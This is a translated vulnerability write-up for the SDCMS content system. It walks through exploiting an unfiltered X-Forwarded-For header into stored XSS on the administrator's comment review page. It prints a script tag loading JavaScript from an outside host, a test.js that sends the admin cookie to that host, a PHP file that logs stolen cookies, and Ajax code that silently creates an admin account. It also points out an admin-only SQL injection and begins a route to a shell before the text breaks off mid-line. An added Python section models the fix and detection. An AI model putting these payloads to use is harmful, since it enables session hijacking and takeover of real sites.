0-day SDCMS Vulnerability Analysis

Author: Amxking
Vulnerability Analysis:

Let's take a look at the following code.

(Note: this method only works when the administrator has enabled comments, but comments are generally enabled.)

In /plug/comment.asp:

Sub save_comment
    ......
    username = sdcms_f.HTMLEncode(username)
    content = sdcms_f.contentEncode(content)
    ip = sdcms_f.getip    ' Note this line: the IP address is obtained here.
    Set rs = Server.CreateObject("adodb.recordset")
    sql = "select username,content,ip,infoid,ispass from sd_comment"
    rs.Open sql, conn, 1, 3
    rs.AddNew
    rs(0) = Left(username, 10)
    rs(1) = content
    rs(2) = ip    ' No filtering: the value is inserted into the database as-is.
    rs(3) = id
    If sdcms_comment_ispass = 1 Then
        msg_contents = ", please wait for review"
        rs(4) = 0
    Else
        rs(4) = 1
    End If
    rs.Update
    ......
End Sub

Now let's look at the implementation of getip, in /inc/function.asp:

Public Function getip
    ip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    If ip = "" Then ip = Request.ServerVariables("REMOTE_ADDR")
    getip = ip
End Function

The problem is plain to see: getip takes the client address from the HTTP_X_FORWARDED_FOR server variable, which is nothing more than the X-Forwarded-For request header, and a request header can be set to any value by whoever sends the request.

So we can craft a request whose X-Forwarded-For header contains a one-line trojan, and that one-liner is written straight into the database. If the database path were known and its extension were .asp, it could be used directly.

Unfortunately the database name of this CMS is not known: during installation, 12 random characters are generated by the code below, and the extension stays .mdb, so the one-liner we inserted cannot be used that way either.
 
/install/index.asp

Function get_something
    Randomize
    Do While Len(pass) < 12    ' 12 random password characters
        num1 = CStr(Chr(Int((57 - 48) * Rnd + 48)))     ' 0 ~ 9
        num2 = CStr(Chr(Int((90 - 65) * Rnd + 65)))     ' A ~ Z
        num3 = CStr(Chr(Int((122 - 97) * Rnd + 97)))    ' a ~ z
        pass = pass & num1 & num2 & num3
    Loop
    get_something = pass
End Function
 
So we take another route in.

Look at the following code in /admin/sdcms_comment.asp:

Sub main
    echo "<form name=""add"" action=""?"" method=""post"" onSubmit=""return confirm('Are you sure you want to perform the selected operation?');"">"
    page = Request.QueryString("page")
    If page = "" Or Not IsNumeric(page) Then
        page = 1
    End If
    pages = 20
    Set rs = Server.CreateObject("adodb.recordset")
    If Request("classid") <> 0 Then tj = " where infoid=" & Request("classid")

The last line above has an SQL injection: classid = sdcms_f.requestint("classid") is used earlier to obtain an integer, but when the query is built the raw Request("classid") is concatenated instead of classid, and its value is not filtered at all. Since exploiting it requires administrator privileges, we will not discuss it further.

    sql = "select id,username,"
    If is_sql = 0 Then
        sql = sql & "(iif(ispass=1,'reviewed','not reviewed'))"
    Else
        sql = sql & "(case ispass when 1 then 'reviewed' else 'not reviewed' end)"
    End If
    sql = sql & ",ip,adddate,content,ispass,infoid from " & sd_table & tj & " order by ispass,id desc"

The query selects the ip column directly, and the template below writes it into the page without any filtering:

<td class="title_bg" style="text-align:left"><span style="float:right"><% If rs(6) = 0 Then %><a href="?action=pass&id=<%=rs(0)%>&t=1&classid=<%=classid%>">Verification passed</a><% Else %><a href="?action=pass&id=<%=rs(0)%>&t=0&classid=<%=classid%>">Cancel verification</a><% End If %> <a href="?action=del&id=<%=rs(0)%>&classid=<%=classid%>" onclick="return confirm('Are you sure you want to delete it? It cannot be recovered!');">Delete</a></span><input name="id" type="checkbox" onClick="unselectall()" value="<%=rs(0)%>"><%=rs(1)%> published on: <%=rs(4)%> IP: <%=rs(3)%></td>

This gives us a stored XSS: the malicious JavaScript executes when the administrator opens the comment review page.

We won't go into XSS itself here. We set HTTP_X_FORWARDED_FOR to <script src=http://www.xuehi.com/test.js></script> (with the malicious JavaScript in test.js).

Then submit. The submission itself is nothing special: capture the request with nc and replay it with the modified header, use a ready-made tool, or write your own program.

Note that the ip field in the database is 50 characters long by default, so the payload must be kept within that length.
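The same bug seen from the defender's side, as an added Python model that is not SDCMS code: the input-side fix for getip (consult X-Forwarded-For only behind a proxy you operate, and only when it parses as an address), the output encoding the admin template above lacks, and a sweep over stored comment rows that flags ip values which are not addresses. The proxy address, sample requests and rows are assumed.

```python
import html
import ipaddress

IP_COLUMN_LEN = 50                 # width of the sd_comment.ip column noted above
TRUSTED_PROXIES = {"10.0.0.5"}     # assumed address of a reverse proxy we operate


def client_ip(server_vars, trusted_proxies=TRUSTED_PROXIES):
    """Hardened stand-in for getip. X-Forwarded-For is only consulted when
    REMOTE_ADDR is a proxy we control (assumed to append the real client
    address as the last element), and every candidate must parse as an IP."""
    remote = server_vars.get("REMOTE_ADDR", "")
    xff = server_vars.get("HTTP_X_FORWARDED_FOR", "")
    if remote in trusted_proxies and xff:
        candidate = xff.split(",")[-1].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            pass            # forged or malformed header: ignore it, fall back
    return str(ipaddress.ip_address(remote))   # raises if REMOTE_ADDR is unusable


def render_ip(stored_ip):
    """Output-side guard for the admin template: encode before interpolation,
    so whatever reached the ip column cannot become markup in the reviewer's page."""
    return html.escape(stored_ip, quote=True)


def suspicious_ip_rows(rows):
    """Detection sweep over stored comment rows: an ip value that does not
    parse as an address did not come from a client address and deserves review."""
    flagged = []
    for row in rows:
        try:
            ipaddress.ip_address(row["ip"])
        except ValueError:
            flagged.append((row["id"], row["ip"][:IP_COLUMN_LEN]))
    return flagged


# Constructed sample requests and table rows for demonstration only.
FORGED_REQUEST = {"REMOTE_ADDR": "203.0.113.9",
                  "HTTP_X_FORWARDED_FOR": "<script src=http://example.invalid/t.js></script>"}
PROXIED_REQUEST = {"REMOTE_ADDR": "10.0.0.5",
                   "HTTP_X_FORWARDED_FOR": "bogus-value, 198.51.100.7"}
SAMPLE_ROWS = [
    {"id": 1, "ip": "203.0.113.9"},
    {"id": 2, "ip": "<script src=http://example.invalid/t.js></script>"},
]
```

Running the sweep against the real sd_comment table is the quickest way to tell whether a deployment has already received such headers.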
 
In this CMS the cookie consists of the 12 characters customised by the author, the administrator username, and the MD5 of the password, so once we have the cookie we essentially have backend access.
 
Now for test.js. If it simply contained

alert(document.cookie)

the administrator's own cookie would pop up while reviewing comments. Of course we won't do it that way: the cookie has to be sent to a remote server, and the following code should look familiar.

test.js:

var img = new Image();
img.src = "http://www.xuehi.com/test.php?cookie=" + document.cookie;

test.php:

<?php
fputs(fopen('a.txt', 'a+'), $_GET['cookie'] . '//');
?>

When the administrator views the comments, a.txt is created on our server containing the administrator's cookie. With the cookie we have the administrator's identity: open the backend and set that cookie.

Of course, you can also use Ajax to make the administrator add an account. The method is as follows:

function getXHR() {
    var xhr = null;
    if (window.XMLHttpRequest) {
        xhr = new XMLHttpRequest();
    } else if (window.createRequest) {
        xhr = window.createRequest();
    } else if (window.ActiveXObject) {
        try {
            xhr = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xhr = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {}
        }
    }
    return xhr;
}

var ajax = getXHR();
ajax.open("POST", "/admin/sdcms_admin.asp?action=save&act=add", false);
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send("t0=test&t1=test&t2=1");
 
After the administrator views the comments, an account is added automatically.

I covered this in earlier articles, so I won't elaborate on it here.

Next, how to get a shell. Let's look at the code that writes the configuration in the backend, in /admin/sdcms_set.asp:

Set fso = Server.CreateObject("scripting.filesystemobject")
Set info = fso.CreateTextFile(Server.MapPath("../inc/const.asp"), True)
info.write "<" & "%" & vbCrLf
......
info.write "%" & ">"
info.close
Set info = Nothing
Set fso = Nothing

The author writes the configuration file to /inc/const.asp, in

Sub save
    t0 = clear_bad(Trim(Request("t0")))
    t1 = clear_bad(Trim(Request("t1")))
    t2 = clear_bad(Trim(Request("t2")))
    t3 = clear_bad(Trim(Request("t3")))
    t4 = clear_bad(Trim(Request("t4")))
    t5 = clear_bad(Trim(Request("t5")))
    t6 = clear_bad(Trim(Request("t6")))
    t7 = clear_bad(Trim(Request("t7")))
    t8 = clear_bad(Trim(Request("t8")))
    t9 = clear_bad(Trim(Request("t9")))
    t10 = clear_bad(Trim(Request("t10")))
    t11 = clear_bad(Trim(Request("t11")))
    t12 = clear_bad(Trim(Request("t12")))
    t13 = trim(requ
